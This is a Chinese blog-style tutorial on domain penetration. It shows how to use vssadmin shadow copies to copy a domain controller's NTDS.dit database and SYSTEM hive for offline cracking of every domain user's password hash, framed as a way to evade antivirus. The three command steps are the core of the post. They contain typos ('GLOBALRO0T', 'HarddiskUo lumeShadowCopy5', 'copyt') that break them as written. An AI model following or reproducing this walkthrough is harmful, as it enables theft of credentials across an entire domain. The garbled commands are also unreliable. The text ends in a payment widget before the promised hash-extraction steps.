域渗透之获得域控服务器的NTDS.dit文件

本文介绍如何通过vssadmin命令创建卷影拷贝,从域控制器安全地复制NTDS.dit和SYSTEM文件,利用impacket工具包进行离线hash遍历,并提供抓取明文密码的方法。

前言:

ntds.dit是主要的AD数据库,存放在c:\windows\NTDS\NTDS.dit,包括有关域用户,组和成员身份的信息,它还包括域中所有用户的密码哈希值,为了进一步保护哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。
因为这两个文件属于系统特殊文件,不能直接复制粘贴,所以需要用特殊的方式来复制粘贴。
当我们拿到域控的权限后,我们可以跑域内所有的hash值,但是如果在线跑hash的话,是比较容易被杀软等软件阻止的,所以我们可以将NTDS.dit文件和SYSTEM复制到本地进行遍历。

利用方式:

利用vssadmin命令创建C盘卷影拷贝:
第一步:打开cmd执行命令:vssadmin create shadow /for=C:
此时卷影副本卷名就是域控的C盘。
在这里插入图片描述
第二步:执行copy \\?\GLOBALRO0T\Device\HarddiskUo lumeShadowCopy5\windows\NTDS\NTDS.dit C:\Users 即可将ntds.dit文件拷贝到C盘的Users用户下。
在这里插入图片描述
第三步:执行 copyt \\?\GLOBALRO0T\Device\HarddiskUo lumeShadowCopy5\windows\System32\config\SYSTEM C:\Users 将SYSTEM文件复制到C盘Users下

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值